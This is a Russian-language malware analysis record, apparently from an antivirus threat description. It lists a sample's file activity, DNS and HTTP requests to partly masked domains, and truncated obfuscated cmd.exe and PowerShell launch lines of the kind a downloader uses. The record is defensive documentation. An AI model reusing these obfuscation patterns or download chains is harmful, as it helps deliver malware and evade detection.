Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' SUunonjzqbm lIBwuiQctCRSEutijrCKL MoRFfTpdoHRhI & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %soNVHDHEijYqfhW%=zZCXzMlXv&&set %InMYOhrDp%=p&&set %wqPtwmA%=o^w&&...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\252905.exe
Удаляет следующие файлы
- C:\users\public\252905.exe
Подменяет следующие файлы
- C:\users\public\252905.exe
Сетевая активность
Подключается к
- 'an##exis.de':80
- 'et##tuer.de':80
- 'et##tuer.de':443
- 'vi###boyz.net':80
- 'ai##sign.de':80
TCP
Запросы HTTP GET
- http://an##exis.de/RXDWHpi/
- http://et##tuer.de/YypTq/
- http://vi###boyz.net/5jJoFBL/
- http://ai##sign.de/QLh0/
Другие
- 'et##tuer.de':443
UDP
- DNS ASK an##exis.de
- DNS ASK bi##abi.net
- DNS ASK et##tuer.de
- DNS ASK vi###boyz.net
- DNS ASK ai##sign.de
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' SUunonjzqbm lIBwuiQctCRSEutijrCKL MoRFfTpdoHRhI & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %soNVHDHEijYqfhW%=zZCXzMlXv&&set %InMYOhrDp%=p&&set %wqPtwmA%=o^w&&...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " & ( ([StriNG]$vErBOsEpREFerenCE)[1,3]+'X'-jOIN'') (([RUNtiME.INteROPSErVIcES.mARShAl]::([RUNTIMe.inTeRopSERVIcEs.MARshAL].GETMeMberS()[2].name).invoKE( [ruNtimE.iNTeropsERVIces.marshAL]::SEcU...
